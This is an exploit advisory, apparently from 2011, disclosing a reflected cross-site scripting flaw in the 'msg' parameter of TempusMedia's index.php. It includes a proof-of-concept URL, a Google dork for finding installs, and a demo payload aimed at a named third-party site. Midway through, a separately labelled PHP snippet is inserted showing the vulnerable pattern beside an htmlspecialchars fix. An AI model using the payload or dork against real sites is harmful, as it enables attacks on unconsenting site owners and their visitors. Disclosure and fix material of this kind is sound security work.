# Exploit Title: TempusMedia (index.php) Cross-site scripting Vulnerability
# Date: 2011-07-08
# Author: Net.Edit0r
# Software Link: http://www.tempusmedia.com/
# Version : 1.0.0
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
TempusMedia (index.php) Cross-site scripting Vulnerability => XSS Vulnerability
-----------------------------------------------------------------------------------------
Author : Net.Edit0r
Date : 2011-07-08
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : [ webapps ]
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: [ index.php?msg=Xss ]
~ [PoC] ~: http://[victim]/path-to-wp/index.php?msg=[Xss]
Dork:
~~~~~
Google : Powered By: TempusMedia
Demo URL:
~~~~~~~~~
- http://www.bonethefish.com/index.php?msg="><script>alert(100000)</script>
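
Fix sketch (added example, not TempusMedia source and not the author's code): the "> prefix in the demo payload suggests that msg is reflected inside a double-quoted HTML attribute, so the block below assumes that context and shows the unencoded pattern beside output encoding with htmlspecialchars(). The function names, the <input> markup and the sample requests are hypothetical.

```php
<?php
// Added example, not TempusMedia source. Function names and the <input>
// markup are hypothetical; the reflection context is assumed from the PoC.

// PHP turns ?msg[]=x into an array; accept only a string value.
function read_msg(array $query): string
{
    $raw = $query['msg'] ?? '';
    return is_string($raw) ? $raw : '';
}

// Vulnerable pattern: raw value concatenated into a double-quoted attribute.
function render_vulnerable(array $query): string
{
    return '<input type="hidden" name="msg" value="' . read_msg($query) . '">';
}

// Hardened: HTML-encode at output. ENT_QUOTES covers both quote styles,
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_hardened(array $query): string
{
    $safe = htmlspecialchars(read_msg($query), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="msg" value="' . $safe . '">';
}

// Constructed requests: the payload shape from the Demo URL, an array-typed
// parameter, and an ordinary status message.
$requests = [
    ['msg' => '"><script>alert(100000)</script>'],
    ['msg' => ['unexpected', 'array']],
    ['msg' => 'Profile saved'],
];

foreach ($requests as $query) {
    echo 'raw:     ', render_vulnerable($query), PHP_EOL;
    echo 'encoded: ', render_hardened($query), PHP_EOL;
}
```

This encoding covers HTML body and quoted-attribute output only; a value written into a script block or a URL needs the encoder for that context.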
Timeline:
~~~~~~~~~
- 05 - 07 - 2011 bug found.
- 07 - 07 - 2011 vendor contacted, but no response.
- 07 - 07 - 2011 advisory released.
Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
---------------------------------------------------------------------------
Greetz To :DarkCoder | Amir-MaGiC | H3x | D3adlY | _AttAcK_ |Dr.Nil0
Special Th4nks: B3hz4d | M4Hd1 | Cru3l.b0y | Mikili | HUrr!c4nE
Web Greetz :http://Black-Hg.Org & http://mn-team.net/ & http://pentesters.ir/
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ----------------------------------